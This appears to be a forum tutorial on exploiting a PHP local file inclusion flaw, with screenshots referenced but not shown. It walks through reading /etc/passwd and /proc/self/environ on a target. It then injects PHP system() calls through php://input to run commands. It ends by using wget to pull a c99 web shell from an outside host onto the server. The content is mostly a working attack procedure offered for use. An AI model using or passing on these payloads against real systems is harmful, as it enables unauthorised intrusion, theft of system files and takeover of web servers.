Code:
http://www.site.com/index.php?page=
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.
First things first, give it a shot and see if you can read "/etc/passwd"
URL will look like:
Code:
Code:
http://www.site.com/index.php?page=/etc/passwd
If successful, you'll be having a page that looks like this:
[Image: AGx7w.png]
Now lets try reading:
Code:
Code:
/proc/self/environ
/proc/self/fd
So URL will become:
Code:
Code:
http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
[Image: E4Ri0.png]
Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"
I'll show you how to exploit via php://input using the "Hackbar"
So lets check what we're supposed to use in the Hackbar
[Image: NC62R.png]
Now let's try putting this method in action.
Look at the picture carefully.
[Image: vMZKf.png]
URL will be:
Code:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
Code:
<? system('uname -a'); ?>
Other commands:
List directories
Code:
Code:
<? system('ls'); ?>
Identification
Code:
Code:
<? system('id'); ?>
Convert format
Code:
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now shall we.
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
Code:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
This is how it's gonna look like.
[Image: qlJRO.png]
Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
Code:
http://www.site.com/shell.php